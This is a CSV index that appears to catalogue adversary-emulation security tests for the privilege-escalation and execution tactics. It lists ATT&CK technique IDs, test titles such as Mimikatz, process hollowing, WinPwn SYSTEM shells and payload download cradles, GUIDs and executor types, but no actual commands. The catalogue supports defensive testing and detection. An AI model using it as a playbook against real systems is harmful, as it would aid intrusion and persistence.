privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
privilege-escalation,T1546.001,Event Triggered Execution: Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
privilege-escalation,T1546.014,Event Triggered Execution: Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,10,Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value,acfef903-7662-447e-a391-9c91c2f00f7b,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,11,Change Startup Folder - HKCU Modify User Shell Folders Startup Value,8834b65a-f808-4ece-ad7e-2acdf647aafa,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,12,HKCU - Policy Settings Explorer Run Key,a70faea1-e206-4f6f-8d9a-67379be8f6f1,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,secedit used to create a Run key in the HKLM Hive,14fdc3f1-6fc3-4556-8d36-aa89d9d42d02,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,Modify BootExecute Value,befc2b40-d487-4a5a-8813-c11085fb5672,powershell
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,2,MacOS - Load Kernel Module via kextload and kmutil,f4391089-d3a5-4dd1-ab22-0419527f2672,bash
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,3,MacOS - Load Kernel Module via KextManagerLoadKextWithURL(),f0007753-beb3-41ea-9948-760785e4c1e5,bash
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,4,Snake Malware Kernel Driver Comadmin,e5cb5564-cc7b-4050-86e8-f2d9eec1941f,powershell
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
privilege-escalation,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
privilege-escalation,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Start Process,adae83d3-0df6-45e7-b2c3-575f91584577,powershell
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,3,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,4,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,5,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,6,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
privilege-escalation,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
privilege-escalation,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
privilege-escalation,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
privilege-escalation,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
privilege-escalation,T1543.002,Create or Modify System Process: Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
privilege-escalation,T1543.002,Create or Modify System Process: Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,1,Copy in loginwindow.plist for Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,sh
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
privilege-escalation,T1574.002,Hijack Execution Flow: DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
privilege-escalation,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
privilege-escalation,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
privilege-escalation,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
privilege-escalation,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
privilege-escalation,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
execution,T1047,Windows Management Instrumentation,4,WMI Reconnaissance List Remote Services,0fd48ef7-d890-4e93-a533-f7dedd5191d3,command_prompt
execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3,command_prompt
execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt
execution,T1047,Windows Management Instrumentation,8,Create a Process using obfuscated Win32_Process,10447c83-fc38-462a-a936-5102363b1c43,powershell
execution,T1047,Windows Management Instrumentation,9,WMI Execute rundll32,00738d2a-4651-4d76-adf2-c43a41dfb243,powershell
execution,T1047,Windows Management Instrumentation,10,Application uninstall using WMIC,c510d25b-1667-467d-8331-a56d3e9bc4ff,command_prompt
execution,T1059.007,Command and Scripting Interpreter: JavaScript,1,JScript execution to gather local computer information via cscript,01d75adf-ca1b-4dd1-ac96-7c9550ad1035,command_prompt
execution,T1059.007,Command and Scripting Interpreter: JavaScript,2,JScript execution to gather local computer information via wscript,0709945e-4fec-4c49-9faf-c3c292a74484,command_prompt
execution,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
execution,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,2,Execute PowerShell script via Word DDE,47c21fb6-085e-4b0d-b4d2-26d72c3830b3,command_prompt
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,3,DDEAUTO,cf91174c-4e74-414e-bec0-8d60a104d181,manual
execution,T1204.002,User Execution: Malicious File,1,OSTap Style Macro Execution,8bebc690-18c7-4549-bc98-210f7019efff,powershell
execution,T1204.002,User Execution: Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-85d3-ba4daa739d80,command_prompt
execution,T1204.002,User Execution: Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,User Execution: Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
execution,T1204.002,User Execution: Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1204.002,User Execution: Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1204.002,User Execution: Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
execution,T1204.002,User Execution: Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
execution,T1204.002,User Execution: Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
execution,T1204.002,User Execution: Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
execution,T1204.002,User Execution: Malicious File,11,Mirror Blast Emulation,24fd9719-7419-42dd-bce6-ab3463110b3c,powershell
execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
execution,T1059.002,Command and Scripting Interpreter: AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique,ce4e76e6-de70-4392-9efe-b281fc2b4087,powershell
execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
execution,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
execution,T1609,Kubernetes Exec Into Container,2,Docker Exec Into Container,900e2c49-221b-42ec-ae3c-4717e41e6219,bash
execution,T1569.001,System Services: Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash
execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
execution,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,3,Run Bloodhound from Memory using Download Cradle,bf8c1441-4674-4dab-8e4e-39d93d08f9b7,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,4,Obfuscation Tests,4297c41a-8168-4138-972d-01f3ee92c804,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,5,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,6,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,7,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell XML requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual
execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,PowerShell Downgrade Attack,9148e7c4-9356-420e-a416-e896e9c0f73e,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,22,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
execution,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,3,Harvest SUID executable files,46274fc6-08a7-4956-861b-24cbbaa0503c,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,4,LinEnum tool execution,a2b35a63-9df1-4806-9a4d-5fe0500845f2,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,5,New script file in the tmp directory,8cd1947b-4a54-41fb-b5ea-07d0ace04f81,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is running,7b38e5cc-47be-44f0-a425-390305c76c17,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,10,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
execution,T1059.004,Command and Scripting Interpreter: Bash,11,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,bash
execution,T1059.004,Command and Scripting Interpreter: Bash,12,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,bash
execution,T1559,Inter-Process Communication,1,Cobalt Strike Artifact Kit pipe,bd13b9fc-b758-496a-b81a-397462f82c72,command_prompt
execution,T1559,Inter-Process Communication,2,Cobalt Strike Lateral Movement (psexec_psh) pipe,830c8b6c-7a70-4f40-b975-8bbe74558acd,command_prompt
execution,T1559,Inter-Process Communication,3,Cobalt Strike SSH (postex_ssh) pipe,d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6,command_prompt
execution,T1559,Inter-Process Communication,4,Cobalt Strike post-exploitation pipe (4.2 and later),7a48f482-246f-4aeb-9837-21c271ebf244,command_prompt
execution,T1559,Inter-Process Communication,5,Cobalt Strike post-exploitation pipe (before 4.2),8dbfc15c-527b-4ab0-a272-019f469d367f,command_prompt
execution,T1204.003,User Execution: Malicious Image,1,Malicious Execution from Mounted ISO Image,e9795c8d-42aa-4ed4-ad80-551ed793d006,powershell
execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
execution,T1059.006,Command and Scripting Interpreter: Python,4,Python pty module and spawn function used to spawn sh or bash,161d694c-b543-4434-85c3-c3a433e33792,bash
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,5,Command Prompt read contents from CMD file and execute,df81db1b-066c-4802-9bc8-b6d030c3ba8e,command_prompt
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
